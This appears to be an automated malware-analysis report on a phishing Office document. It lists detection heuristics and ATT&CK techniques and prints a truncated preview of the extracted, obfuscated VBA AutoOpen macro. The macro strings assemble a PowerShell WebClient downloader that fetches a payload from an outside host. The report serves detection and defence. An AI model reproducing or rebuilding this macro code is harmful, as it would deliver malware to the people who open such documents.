MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The OLE document contains VBA macros, including an AutoOpen function, which is designed to execute automatically upon opening. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, strongly suggesting that the macro attempts to download and execute a secondary payload. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports a dropper or downloader role, likely used in phishing campaigns.
Heuristics 7
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 162,816 bytes but its declared streams total only 24,543 bytes — 138,273 bytes (85%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LUREDocument gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 54708 bytes |
SHA-256: 6893745c4e8cc02895a0c56ea0dec2593d0c385def9502ffb1d6d7fb93fffd1a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "kXSIJjXw"
Function CHPFIHiQTjTW()
wjwOJEEbiJ = UCase("twmzmFp" + "IpGbrhVLXD" + "VMUTpmsFfvvHrR" + "jsTJHWpSGnzJ" + "XtANYBApY") + UCase("zNtzJcMiOKG" + "dsNvbju" + "jpciilvhj" + "QwIPVvNWfptFk" + "HXQHzdaTuJwHlO")
ZFwiXi = Mid("fTwsuQZwnTP4aZw-objeerp+erpc'+'t Syserp+erpte'+'rp+erpem.Net.e'+'rp+ekV+ekVerpWeberp+erpClierp+erpent;i3wnsaderp+erpasd erp+eekV+ekVrp= nerp+er'+'pewerp+erp-object random;i3erp+jY1zKDkGdq0mwomPrj6mzEi", 15, 163)
zJDXQsIPK = UCase("ritTnGRkj" + "YXLuFMcRP" + "lwzWiXWlwI" + "JsDjnjfsO" + "CBCzkMbdQZ") + UCase("WEdthWlQkf" + "YzOfHLRjzZACj" + "uXwKvHfjrnnapG" + "ubiqOcFl" + "EPMkbzW")
fWraiqpGPqP = UCase("XhfwYtJsN" + "RhFAEVbEcX" + "VnhGPzBw" + "NKwEIIOGMF" + "fDlivUTqoUDIrG") + UCase("tzsIwIu" + "IHjAsvHVsXZfRB" + "KvdLJwKCHzFOQN" + "JpkJcbM" + "auhzKlSbkr")
uSCaYc = UCase("GihzufCbOTR" + "uATtIsPEJj" + "aZbiVfMoPv" + "wnjYGLjHJEDEFd" + "tKCRlRZ") + UCase("HXTzjwBi" + "dzDfNkl" + "UBXQWUV" + "SlBlzJd" + "iYAnNCLHZB")
vjCQiURjQdn = Mid("5GCUU'+'HAR]36))ekV) -rEpLACEekVzxpekV,7CvawA", 6, 35)
dvjPosaEYjW = UCase("iNSzkvwEcCnhqI" + "NjuIZYwbDQczz" + "oWUWSiprs" + "OiWkRnN" + "rVXijcSZjmPjI") + UCase("wnnjSKXdzWrutu" + "OJPDlIi" + "GqsEtvCbLsSji" + "lVDSOVBrliXYVd" + "dWnTuhp")
CsHfbJdTukH = UCase("FZYjaQOQPCt" + "CzsOKAtDTWjA" + "jwqRqPqUtQftE" + "VjsOUknwpUo" + "GjzIjtX") + UCase("rSXzYmDQJhNUF" + "YUaILQAkIV" + "qIJWljlWNjC" + "tphjXpIH" + "uhIdiaiHqG")
tzCjAsSb = UCase("WhdazNH" + "AIBVQvk" + "OlZkNAdRi" + "TjSuvEFXrzpfaj" + "dcLvDaRL") + UCase("OMSnqVELsDt" + "jGMzPtDkbiK" + "bjXSWiVBVqfjm" + "hVvinWmiu" + "wzohNaAfBY")
sHWBiLv = Mid("rO1CW[ChAR]36 -CrEPlACEekVerpekV,[ChAR]39)) ') -CrePLAcE ([Char]68+[Char]88+[Char]57),[Char]36-CrePLAcE 'ekV',[Char]39))OOMz1q1", 6, 117)
ioKolSOOGH = UCase("CVidutXA" + "wsqVIjSdjdv" + "NJvbAtDFDPWctJ" + "HDmdRIfWCq" + "VBIEXNLJoMnCt") + UCase("UuYiWNc" + "ILawzirimtkNXB" + "zrJRjVLTBtdwOH" + "jdLXtwdaNhSGZ" + "RfdTwZrMwsdzrY")
bjlMjEUF = UCase("GwloOhrG" + "acKwLhpzvoGtp" + "TYqoouq" + "hNEaXJp" + "oucBwVnpVj") + UCase("DjNSTRwSQXtD" + "CZvztlKf" + "WzLQnDzl" + "TIInQUu" + "IZrZBvrQzWap")
LWXaD = UCase("zcPNpubaCNI" + "tuWPuLptb" + "BlcoMplDTWnE" + "TkSzWzlH" + "izUNJITzp") + UCase("wSbdlBh" + "pztlbpiCibOS" + "paiHfUwfcjVhiF" + "sHjwpLwHZtViiG" + "rjWHIrsWGhi")
mZVwiwtZfi = Mid("FXuziB8riub'-J'+'oiekV+'+'ekVn'+'erperp)( ((erpi3werp+erpfrerp+e'+'rpanc =ekV+ekV neerp+erpYhKhu1", 12, 80)
jjfVJHldh = UCase("jVFvNNHCiuUiXZ" + "DOJaCIckoiVDTA" + "jWvEjmCrDGnii" + "WudWvMlNAnn" + "kQNrKnCr") + UCase("ziTpJAXFT" + "awGSnrhYo" + "TWIQcBl" + "LwzjmRYLKjm" + "NHjXNJiw")
ncGCw = UCase("MQXDsjo" + "XuRdksTJ" + "JpUYwsmKa" + "BAkaPGGkrBpdvp" + "GwRtXQYjIwrOjN") + UCase("ltRnnKnUCX" + "IcHYjuicsvV" + "DjdQbiXrZ" + "TQvLHCmTcO" + "tHwbkQzkEU")
YkwGEMSwlZn = UCase("bfdjBZbSRIfWt" + "TRYMlrnXmdFC" + "OoinCzl" + "YIlrYwHIJzFtt" + "NJozTEDsz") + UCase("wUNdjVdXIvv" + "mUMsfPdf" + "JLAbYzC" + "jmfJHsEliYo" + "ilwSEXTmaZ")
FoJHdGJrok = Mid("6BHdwja1BL7ofAB'V+ekV+erptiekV+ekVerp+erpbeer.it/Cerp+erplerp+erpvRerp+erpA/erp+erpDTXerp+erp.'+'ekV+ekVSperp+ee'+'kV+ekVrplit(erp+erpDerp+erpTX,DTX);ierp+erp3'+'werp+erpkarapasemEQiYnnzpvMD", 16, 163)
NFZBE = UCase("QcNGJtLqffF" + "IrcUmbpZTGuK" + "horNZGUBrA" + "wAtsHmjqn" + "nkHwLIPvIJ") + UCase("DhcEUcGZkjRr" + "WliwSjWD" + "DtEjRNzFGi" + "kuTQnmKdRDlVs" + "aaaSdcnfjiiAkL")
KfjEBAHPXDu = UCase("PUdpIMCLVasbI" + "zicIHBqoK" + "XNiWBjQEH" + "QpiDwYbNTuqJqD" + "sriTXwa") + UCase("LRvijKpK" + "UJwKAYMiZdVQb" + "XiQIplkjA" + "fSlBtvCdkCpjE" + "rSSkwVFtkEXzQB")
DInSZNEv = UCase("BtkNNvscks" + "juCScElaPIMMcL" + "GdwTmDzOUjm" + "iYrnQOzazUGjT" + "aFNojHCmoOiQF") + UCase("jjimqRDCXUwwdk" + "mXRAwdrBjzi" + "wjdJzIFqRmUp" + "kXissii" + "ICrMQHQsi")
jiUzfYPLN = Mid("1HKLd5QB4RtFZN0mvS8uV+'erpekV+ekVwa'+'ekV+ekVerp+erpbc.ToString(
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.